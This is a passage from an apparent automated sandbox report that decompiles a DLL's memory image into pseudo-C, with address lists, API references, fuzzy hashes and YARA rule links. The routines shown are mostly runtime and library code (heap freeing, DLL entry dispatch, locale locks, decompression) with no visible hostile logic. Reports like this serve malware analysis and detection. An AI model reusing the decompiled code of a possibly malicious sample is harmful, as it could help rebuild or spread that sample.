																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _t417;
																						}
																						goto L110;
																					}
																					L122:
																					_t311 = _t377 * 0xc;
																					_t204 = _t311 + 0x6ee5f858; // 0x6ee35745
																					 *0x6ee5714c(_t444);
																					_t313 =  *((intOrPtr*)( *_t204))();
																					_t409 = _v728;
																					__eflags = _t313;
																					if(_t313 == 0) {
																						__eflags = _t409 - 0x6ee77ce8;
																						if(_t409 != 0x6ee77ce8) {
																							_t468 = _t377 + _t377;
																							__eflags = _t468;
																							asm("lock xadd [eax], ecx");
																							if(_t468 != 0) {
																								goto L129;
																							} else {
																								E6EE4471C( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
																								E6EE4471C( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
																								E6EE4471C( *(_t444 + 0xa0 + _t377 * 4));
																								_t412 = _v712;
																								 *(_v720 + _t444) = _t412;
																								 *(_t444 + 0xa0 + _t377 * 4) = _t412;
																							}
																						}
																						_t410 = _v732;
																						 *_t410 = 1;
																						 *((intOrPtr*)(_t444 + 0x28 + (_t377 + _t377) * 8)) = _t410;
																					} else {
																						 *((intOrPtr*)(_v720 + _t444)) = _t409;
																						E6EE4471C( *(_t444 + 0xa0 + _t377 * 4));
																						 *(_t444 + 0xa0 + _t377 * 4) = _v748;
																						E6EE4471C(_v732);
																						 *(_t444 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			__eflags = _v16 ^ _t473;
																			return E6EE361A7(_v16 ^ _t473);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t295 = _t294 | 0x00000001;
																	__eflags = _t295;
																	goto L93;
																}
															} else {
																_t341 = _t459 + _t459;
																__eflags = _t341 - 0x106;
																if(_t341 >= 0x106) {
																	E6EE36371();
																	goto L83;
																} else {
																	 *((short*)(_t472 + _t341 - 0x10c)) = 0;
																	_t343 =  &_v276;
																	_push(_t343);
																	_push(_v456);
																	_push(_t440);
																	L84();
																	_t394 = _v452;
																	_t478 = _t480 + 0xc;
																	__eflags = _t343;
																	if(_t343 != 0) {
																		_t394 = _t394 + 1;
																		_v452 = _t394;
																	}
																	L55:
																	_t456 = _t372 + _t459 * 2;
																	_t279 =  *_t456 & 0x0000ffff;
																	_t431 = _t279;
																	__eflags = _t279;
																	if(_t279 != 0) {
																		_t456 = _t456 + 2;
																		__eflags = _t456;
																		_t431 =  *_t456 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t394;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t344 = 0x3b;
														__eflags =  *_t372 - _t344;
														if( *_t372 != _t344) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t456;
						if(_t456 != 0) {
							_push(_t456);
							_push(_t259);
							_push(_t440);
							L84();
						}
						L81:
						__eflags = _v12 ^ _t472;
						return E6EE361A7(_v12 ^ _t472);
					}
				}
				L136:
			}

0x6ee47040
0x6ee47040
0x6ee47048
0x6ee47049
0x6ee47052
0x6ee47055
0x6ee4705a
0x6ee4705c
0x6ee4705e
0x6ee47061
0x6ee4717e
0x6ee47181
0x6ee47067
0x6ee47067
0x6ee47068
0x6ee4706a
0x6ee4706a
0x6ee4706d
0x6ee47070
0x6ee47073
0x6ee47076
0x6ee47078
0x6ee4707b
0x6ee47080
0x6ee4708e
0x6ee47098
0x6ee4709b
0x6ee4709e
0x6ee4709e
0x6ee470a9
0x6ee470ae
0x6ee470b3
0x00000000
0x6ee470b9
0x6ee470bc
0x6ee470bc
0x6ee470bf
0x6ee470c1
0x6ee470c4
0x6ee470c6
0x6ee470c6
0x6ee470c6
0x6ee470c9
0x6ee470c9
0x6ee470c9
0x6ee470cf
0x00000000
0x00000000
0x6ee470d4
0x6ee470eb
0x6ee470eb
0x6ee470d6
0x6ee470d6
0x6ee470de
0x00000000
0x6ee470e0
0x6ee470e0
0x6ee470e3
0x6ee470e9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee470e9
0x6ee470de
0x6ee470f4
0x6ee470f4
0x6ee470f9
0x6ee470fe
0x6ee47102
0x6ee4710e
0x6ee47111
0x6ee47114
0x6ee4711e
0x6ee47126
0x6ee4712e
0x00000000
0x6ee47134
0x6ee47138
0x6ee47183
0x6ee4718c
0x6ee4718f
0x6ee47191
0x6ee47195
0x6ee47199
0x6ee4719e
0x6ee471a3
0x6ee47199
0x6ee471a7
0x6ee471a9
0x6ee471ab
0x6ee471af
0x6ee471b0
0x6ee471b5
0x6ee471ba
0x6ee471b0
0x6ee471bd
0x6ee471c0
0x6ee471c3
0x6ee471c6
0x6ee471c9
0x6ee4713a
0x6ee4713d
0x6ee47140
0x6ee47142
0x6ee47146
0x6ee4714a
0x6ee4714f
0x6ee47154
0x6ee4714a
0x6ee4715a
0x6ee4715c
0x6ee47161
0x6ee47166
0x6ee4716b
0x6ee47161
0x6ee4716c
0x6ee47170
0x6ee47170
0x6ee47173
0x6ee47177
0x6ee4717a
0x6ee4717a
0x00000000
0x6ee4717d
0x00000000
0x6ee4712e
0x6ee470ef
0x6ee470f1
0x6ee470f1
0x00000000
0x6ee470f1
0x6ee471d0
0x6ee471d1
0x6ee471d2
0x6ee471d3
0x6ee471d4
0x6ee471d5
0x6ee471da
0x6ee471de
0x6ee471e0
0x6ee471e6
0x6ee471ed
0x6ee471f0
0x6ee471f3
0x6ee471f4
0x6ee471f5
0x6ee471f8
0x6ee471f9
0x6ee471fc
0x6ee47202
0x6ee47204
0x6ee47229
0x6ee47233
0x6ee47239
0x6ee4723b
0x6ee47241
0x6ee47243
0x6ee474a3
0x6ee474a4
0x00000000
0x6ee47249
0x6ee47249
0x6ee4724d
0x6ee473bb
0x6ee473d8
0x6ee473dd
0x6ee473e0
0x6ee473e2
0x6ee473e8
0x6ee473ea
0x6ee473ed
0x6ee473ef
0x6ee473f5
0x6ee473f5
0x6ee473f7
0x6ee4747e
0x6ee4747e
0x6ee473fd
0x6ee473fd
0x6ee473ff
0x6ee47405
0x6ee47408
0x6ee4740b
0x6ee47411
0x00000000
0x00000000
0x6ee47413
0x6ee47417
0x6ee47440
0x6ee47442
0x6ee47419
0x6ee47419
0x6ee4741d
0x6ee47421
0x6ee47428
0x6ee4742e
0x00000000
0x6ee47430
0x6ee47430
0x6ee47433
0x6ee47436
0x6ee4743e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4743e
0x6ee4742e
0x6ee4744d
0x6ee4744d
0x6ee4744f
0x6ee4747d
0x6ee4747d
0x00000000
0x6ee47451
0x6ee47451
0x6ee47457
0x6ee47458
0x6ee47459
0x6ee4745a
0x6ee4745f
0x6ee47465
0x6ee47468
0x6ee4746a
0x6ee47473
0x6ee47475
0x6ee4746c
0x6ee4746c
0x00000000
0x6ee4746d
0x6ee4746a
0x00000000
0x6ee4744f
0x6ee47446
0x6ee47448
0x6ee4744b
0x00000000
0x6ee4744b
0x6ee47484
0x6ee47484
0x6ee47485
0x6ee47488
0x6ee4748e
0x6ee4748e
0x6ee47497
0x6ee47499
0x00000000
0x6ee4749b
0x6ee4749b
0x6ee4749d
0x00000000
0x6ee4749f
0x6ee4749f
0x6ee4749d
0x6ee47499
0x00000000
0x6ee47253
0x6ee47253
0x6ee47258
0x00000000
0x6ee4725e
0x6ee4725e
0x6ee47263
0x00000000
0x6ee47269
0x6ee47269
0x6ee4726f
0x6ee47274
0x6ee47276
0x6ee4727d
0x6ee4727e
0x6ee47280
0x00000000
0x00000000
0x6ee47286
0x6ee47286
0x6ee4728a
0x6ee47290
0x00000000
0x6ee47296
0x6ee47298
0x6ee47299
0x6ee4729c
0x00000000
0x6ee472a2
0x6ee472a2
0x6ee472a8
0x6ee472ad
0x6ee472b7
0x6ee472bb
0x6ee472c0
0x6ee472c3
0x6ee472c5
0x00000000
0x6ee472c7
0x6ee472c7
0x6ee472c9
0x6ee472cc
0x6ee472cc
0x6ee472cf
0x6ee472d2
0x6ee472d2
0x6ee472dd
0x6ee472df
0x6ee472e1
0x00000000
0x00000000
0x6ee472e1
0x00000000
0x6ee472e3
0x6ee472e3
0x6ee472e9
0x6ee472ec
0x6ee472ec
0x6ee472fa
0x6ee47303
0x6ee47308
0x6ee4730e
0x6ee47311
0x6ee47312
0x6ee47314
0x6ee47322
0x6ee47322
0x6ee47329
0x6ee4738a
0x00000000
0x6ee4732b
0x6ee4732b
0x6ee47339
0x6ee4733e
0x6ee47341
0x6ee47343
0x6ee474be
0x6ee474c0
0x6ee474c1
0x6ee474c2
0x6ee474c3
0x6ee474c4
0x6ee474c5
0x6ee474ca
0x6ee474cd
0x6ee474ce
0x6ee474d6
0x6ee474dd
0x6ee474e0
0x6ee474e1
0x6ee474e4
0x6ee474e8
0x6ee474e9
0x6ee474ec
0x6ee474fc
0x6ee4751f
0x6ee47524
0x6ee47527
0x6ee47529
0x6ee477df
0x6ee477df
0x00000000
0x6ee4752f
0x6ee4752f
0x6ee47532
0x6ee47532
0x6ee47535
0x6ee4753b
0x6ee47544
0x6ee47546
0x6ee47549
0x6ee47550
0x6ee47553
0x6ee47559
0x00000000
0x00000000
0x6ee4755b
0x6ee4755f
0x6ee47588
0x6ee47588
0x6ee47561
0x6ee47561
0x6ee47565
0x6ee47569
0x6ee47570
0x6ee47576
0x00000000
0x6ee47578
0x6ee47578
0x6ee4757b
0x6ee4757e
0x6ee47586
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee47586
0x6ee47576
0x6ee47595
0x6ee47595
0x6ee47597
0x6ee475a0
0x6ee475a6
0x6ee475a9
0x6ee475a9
0x6ee475ac
0x6ee475af
0x6ee475af
0x6ee475bf
0x6ee475cd
0x6ee475d2
0x6ee475d9
0x6ee475db
0x00000000
0x6ee475e1
0x6ee475e7
0x6ee475f4
0x6ee475fd
0x6ee47603
0x6ee47610
0x6ee47617
0x6ee4761c
0x6ee4761f
0x6ee47621
0x6ee4785f
0x6ee47865
0x6ee47866
0x6ee47867
0x6ee47868
0x6ee47869
0x6ee4786a
0x6ee4786f
0x6ee47872
0x6ee47875
0x6ee47876
0x6ee47888
0x6ee4788d
0x6ee4788f
0x6ee47898
0x00000000
0x6ee47898
0x6ee47891
0x6ee47894
0x6ee47896
0x00000000
0x00000000
0x6ee4789e
0x6ee47627
0x6ee47627
0x6ee47635
0x6ee47638
0x6ee4764e
0x6ee47655
0x6ee4765a
0x6ee4763a
0x6ee4763a
0x6ee47642
0x00000000
0x6ee47644
0x6ee47644
0x6ee4764a
0x6ee4764a
0x6ee47642
0x6ee47661
0x6ee47668
0x6ee4766b
0x6ee47769
0x6ee4776c
0x6ee47779
0x6ee4777c
0x6ee47784
0x6ee47784
0x6ee4776e
0x6ee47774
0x6ee47774
0x6ee47671
0x6ee47671
0x6ee4767d
0x6ee47683
0x6ee47689
0x6ee4768c
0x6ee47692
0x6ee47695
0x6ee47698
0x00000000
0x00000000
0x6ee4769a
0x6ee476a3
0x6ee476a7
0x6ee476b0
0x6ee476b4
0x6ee476b5
0x6ee476bb
0x6ee476c1
0x6ee476c7
0x6ee476ca
0x00000000
0x00000000
0x6ee476cc
0x6ee476eb
0x6ee476eb
0x6ee476ee
0x6ee4770b
0x6ee47710
0x6ee47713
0x6ee47715
0x6ee47753
0x6ee47717
0x6ee47717
0x6ee4771d
0x6ee47722
0x6ee4772a
0x6ee4772b
0x6ee4772b
0x6ee47742
0x6ee47749
0x6ee4774c
0x6ee4774e
0x6ee4774e
0x6ee47759
0x6ee4775f
0x6ee4775f
0x6ee47764
0x00000000
0x6ee47764
0x6ee476ce
0x6ee476d0
0x6ee476d5
0x6ee476db
0x6ee476e4
0x6ee476e7
0x6ee476e7
0x00000000
0x6ee476d0
0x6ee47787
0x6ee47787
0x6ee4778b
0x6ee47793
0x6ee47799
0x6ee4779c
0x6ee477a2
0x6ee477a4
0x6ee477f0
0x6ee477f6
0x6ee477fd
0x6ee477fd
0x6ee47803
0x6ee47807
0x00000000
0x6ee47809
0x6ee4780d
0x6ee47816
0x6ee47822
0x6ee47830
0x6ee47836
0x6ee47839
0x6ee47839
0x6ee47807
0x6ee47848
0x6ee47850
0x6ee47859
0x6ee477a6
0x6ee477ac
0x6ee477b6
0x6ee477c8
0x6ee477cf
0x6ee477dc
0x00000000
0x6ee477dc
0x00000000
0x6ee477a4
0x6ee47621
0x6ee47599
0x6ee477e1
0x6ee477e6
0x6ee477ef
0x6ee477ef
0x00000000
0x6ee47597
0x6ee47590
0x6ee47592
0x6ee47592
0x00000000
0x6ee47592
0x6ee47349
0x6ee47349
0x6ee4734c
0x6ee47351
0x6ee474b9
0x00000000
0x6ee47357
0x6ee47359
0x6ee47361
0x6ee47367
0x6ee47368
0x6ee4736e
0x6ee4736f
0x6ee47374
0x6ee4737a
0x6ee4737d
0x6ee4737f
0x6ee47381
0x6ee47382
0x6ee47382
0x6ee47390
0x6ee47390
0x6ee47393
0x6ee47396
0x6ee47398
0x6ee4739b
0x6ee4739d
0x6ee4739d
0x6ee473a0
0x6ee473a0
0x6ee473a3
0x6ee473a6
0x00000000
0x6ee473ac
0x6ee473ac
0x6ee473ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee473ae
0x6ee473a6
0x6ee47351
0x6ee47343
0x6ee47316
0x6ee47318
0x6ee47319
0x6ee4731c
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4731c
0x6ee47314
0x6ee4729c
0x00000000
0x6ee47290
0x00000000
0x6ee473b4
0x6ee47263
0x6ee47258
0x6ee4724d
0x6ee47206
0x6ee47206
0x6ee47208
0x6ee4720a
0x6ee4720b
0x6ee4720c
0x6ee4720d
0x6ee47212
0x6ee474aa
0x6ee474af
0x6ee474b8
0x6ee474b8
0x6ee47204
0x00000000

APIs

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

_free.LIBCMT ref: 6EE4714F
_free.LIBCMT ref: 6EE47166
_free.LIBCMT ref: 6EE47183
_free.LIBCMT ref: 6EE4719E
_free.LIBCMT ref: 6EE471B5

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: cceadbcaca6c49038d5a77cfa8a9728e2db66ff15fc69ea7eff35a1c9e20f9cf
Instruction ID: d5f17420061b98bbc5ab3130f7f07c237e7654b2765e8ce4faceacca16f13210
Opcode Fuzzy Hash: cceadbcaca6c49038d5a77cfa8a9728e2db66ff15fc69ea7eff35a1c9e20f9cf
Instruction Fuzzy Hash: 2C5193B1A10605EFDB51DFA9EC40AAA77F9EF45324F20456DE849DB394E731EA01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EE36A65, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6EE36A65(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6ee686f0);
				E6EE374F0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6EE3685B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(__eflags == 0) {
							goto L16;
						}
						L8:
						_t26 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(__eflags == 0) {
								_t29 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t47 + 8)), _t26, _t35);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6EE369B5(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6EE3685B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(__eflags == 0) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6ee78ee4 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6ee36a65
0x6ee36a65
0x6ee36a67
0x6ee36a6c
0x6ee36a71
0x6ee36a76
0x6ee36a87
0x6ee36a87
0x6ee36a8b
0x6ee36a8e
0x6ee36a9a
0x6ee36a9a
0x6ee36aa7
0x6ee36aa9
0x6ee36aac
0x6ee36aae
0x6ee36b57
0x6ee36b57
0x6ee36b5e
0x6ee36b60
0x6ee36b63
0x6ee36b6f
0x6ee36b6f
0x6ee36ab9
0x6ee36abe
0x6ee36ac0
0x6ee36ac3
0x6ee36ac5
0x00000000
0x00000000
0x6ee36acb
0x6ee36ad0
0x6ee36ad5
0x6ee36ad7
0x6ee36ada
0x6ee36add
0x6ee36adf
0x6ee36ae1
0x6ee36ae8
0x6ee36aed
0x6ee36aef
0x6ee36aef
0x6ee36af5
0x6ee36af6
0x6ee36afb
0x6ee36b01
0x6ee36b01
0x6ee36ae1
0x6ee36b06
0x6ee36b08
0x6ee36b0f
0x6ee36b19
0x6ee36b1b
0x6ee36b1e
0x6ee36b20
0x6ee36b2c
0x6ee36b54
0x6ee36b54
0x00000000
0x6ee36b0a
0x6ee36b0a
0x6ee36b0d
0x00000000
0x00000000
0x00000000
0x6ee36b0d
0x6ee36b08
0x6ee36a90
0x6ee36a93
0x00000000
0x00000000
0x6ee36a95
0x00000000
0x6ee36a95
0x6ee36a78
0x6ee36a7e
0x00000000
0x00000000
0x6ee36a80
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6EE36AA2
dllmain_crt_dispatch.LIBCMT ref: 6EE36AB9
dllmain_raw.LIBCMT ref: 6EE36B01
dllmain_crt_dispatch.LIBCMT ref: 6EE36B14
dllmain_raw.LIBCMT ref: 6EE36B27

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5169bda4769b04a6bcbeac9475f894d59612bf46a36d6135cc20c42ae48a7cfe
Instruction ID: e1c9e6195ace5432bf10f4ca43cae1cfae9afde97b4c67d3ea322b5238f57ba7
Opcode Fuzzy Hash: 5169bda4769b04a6bcbeac9475f894d59612bf46a36d6135cc20c42ae48a7cfe
Instruction Fuzzy Hash: F72153B1E20577AFDB61CEE5C850AAF3A79DB81798B314529E91457210E331CD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDC90, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EDCDC90(void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v76;
				char _v100;
				char _v144;
				char _v188;
				char _v232;
				intOrPtr _t39;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr _t79;
				void* _t83;

				_t83 = __eflags;
				_push(0xffffffff);
				_push(E6EE56290);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t79;
				_v20 = 0;
				E6EDB3520( &_v76);
				_v8 = 0;
				_t39 =  *0x6ee6a028; // 0x17981
				E6EDB34C0( &_v144, _t83, E6EDB3870, _t39); // executed
				_v8 = 1;
				E6EDCC530( &_v76, _t83,  &_v144); // executed
				_v8 = 0;
				E6EDCC420( &_v144);
				_t44 = E6EDCD740( &_v144, _t83,  &_v100,  &_v76); // executed
				_v24 = _t44;
				_v28 = _v24;
				_v8 = 2;
				E6EDB3460( &_v188, _v28); // executed
				E6EDCC500( &_v76, _t83,  &_v188); // executed
				E6EDCC420( &_v188);
				_v8 = 0;
				E6EDB1D80( &_v100); // executed
				_t50 = E6EDCE7B0(_t83,  &_v232,  &_v76); // executed
				_v32 = _t50;
				E6EDCC500( &_v76, _t83, _v32); // executed
				E6EDCC420( &_v232);
				E6EDCC170(_a4,  &_v76);
				_v20 = _v20 | 0x00000001;
				_v8 = 0xffffffff;
				E6EDCC420( &_v76);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x6edcdc90
0x6edcdc93
0x6edcdc95
0x6edcdca0
0x6edcdca1
0x6edcdcae
0x6edcdcb8
0x6edcdcbd
0x6edcdcc4
0x6edcdcd5
0x6edcdcda
0x6edcdce8
0x6edcdced
0x6edcdcf7
0x6edcdd04
0x6edcdd0c
0x6edcdd12
0x6edcdd15
0x6edcdd23
0x6edcdd32
0x6edcdd3d
0x6edcdd42
0x6edcdd49
0x6edcdd59
0x6edcdd61
0x6edcdd6b
0x6edcdd76
0x6edcdd82
0x6edcdd8d
0x6edcdd90
0x6edcdd9a
0x6edcdda5
0x6edcddaf

APIs

~.LIBCPMTD ref: 6EDCDCF7

Part of subcall function 6EDCC420: task.LIBCPMTD ref: 6EDCC435

Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD822
Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD96E
Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD998

~.LIBCPMTD ref: 6EDCDD3D
task.LIBCPMTD ref: 6EDCDD49

Part of subcall function 6EDCE7B0: ~.LIBCPMTD ref: 6EDCE8B0
Part of subcall function 6EDCE7B0: task.LIBCPMTD ref: 6EDCE8CB

~.LIBCPMTD ref: 6EDCDD76
~.LIBCPMTD ref: 6EDCDD9A

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 45146cce4d8c010f85e302058b7453ac92c777d210fddd7a571546b39c874ffe
Instruction ID: 99c4b819349862395c1f58cdc45e3f29dccb25a3ae68f831716778720be93246
Opcode Fuzzy Hash: 45146cce4d8c010f85e302058b7453ac92c777d210fddd7a571546b39c874ffe
Instruction Fuzzy Hash: 16312E71C10108DFCB05DBD4CC54BEEBBBCAF54704F448999D1066B290EB746A4ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD03F0, Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDD03F0(void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _t31;
				void* _t37;

				E6EE3449E( &_v28, 0);
				_t31 =  *0x6ee788f8; // 0xa77448
				_v8 = _t31;
				_v24 = E6EDD0D30(0x6ee789e0);
				_v16 = E6EDD1060(_a4, _v24);
				if(_v16 == 0) {
					if(_v8 == 0) {
						_t37 = E6EDD0F90( &_v8, _a4); // executed
						__eflags = _t37 - 0xffffffff;
						if(__eflags != 0) {
							_v12 = _v8;
							E6EDD00A0( &_v20, _v12);
							E6EE34679(__eflags, _v12);
							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 4))))();
							 *0x6ee788f8 = _v8;
							_v16 = _v8;
							E6EDD1B00( &_v20);
							E6EDD0A90( &_v20);
						} else {
							E6EDD1300();
						}
					} else {
						_v16 = _v8;
					}
				}
				_v32 = _v16;
				E6EE344F6( &_v28);
				return _v32;
			}

0x6edd03fb
0x6edd0400
0x6edd0405
0x6edd0412
0x6edd0421
0x6edd0428
0x6edd042e
0x6edd0440
0x6edd0448
0x6edd044b
0x6edd0457
0x6edd0461
0x6edd046a
0x6edd047d
0x6edd0482
0x6edd048a
0x6edd0490
0x6edd0498
0x6edd044d
0x6edd044d
0x6edd044d
0x6edd0430
0x6edd0433
0x6edd0433
0x6edd042e
0x6edd04a0
0x6edd04a6
0x6edd04b1

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EDD03FB
int.LIBCPMTD ref: 6EDD040D

Part of subcall function 6EDD0D30: std::_Lockit::_Lockit.LIBCPMT ref: 6EDD0D46
Part of subcall function 6EDD0D30: std::_Lockit::~_Lockit.LIBCPMT ref: 6EDD0D70

Concurrency::cancel_current_task.LIBCPMTD ref: 6EDD044D
std::_Lockit::~_Lockit.LIBCPMT ref: 6EDD04A6

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 4ffbcdcd1c34b87f616a61ce6008ceb148216c33edd363f79d143c92d884b287
Instruction ID: 243b95f1228d9051bf2cff8797192e3007c1f2efb2ac9c0845593c34ea31aec3
Opcode Fuzzy Hash: 4ffbcdcd1c34b87f616a61ce6008ceb148216c33edd363f79d143c92d884b287
Instruction Fuzzy Hash: A0210975D00119EFCB04DFE4D890AEEB7B9EF84344F2085A9D41567290EB30AE49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCE7B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EDCE7B0(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				char _v68;
				char _v112;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				void* _t56;
				intOrPtr _t84;
				void* _t87;

				_push(0xffffffff);
				_push(E6EE563AD);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_v32 = 0;
				E6EDB1B00( &_v68);
				_v8 = 0;
				E6EDB1D00( &_v44, _a8);
				_v8 = 1;
				E6EDB1EB0( &_v44,  &_v20);
				E6EDB1ED0( &_v44,  &_v68, __eflags,  &_v68); // executed
				_push(_v20); // executed
				_t45 = E6EE3ACE2(); // executed
				_v28 = _t45;
				_v24 = _v20;
				_t46 = E6EDB29F0( &_v68);
				_t49 = E6EE2ECC0(_v28,  &_v24, E6EDB2660( &_v68), _t46); // executed
				_t87 = _t84 - 0x60 + 0x14;
				_t90 = _t49;
				if(_t49 != 0) {
					_push("uncompress failed");
					E6EDB2B80(_t90);
					_t87 = _t87 + 4;
					E6EE3AAA4(1);
				}
				_t91 = _v20 - _v24;
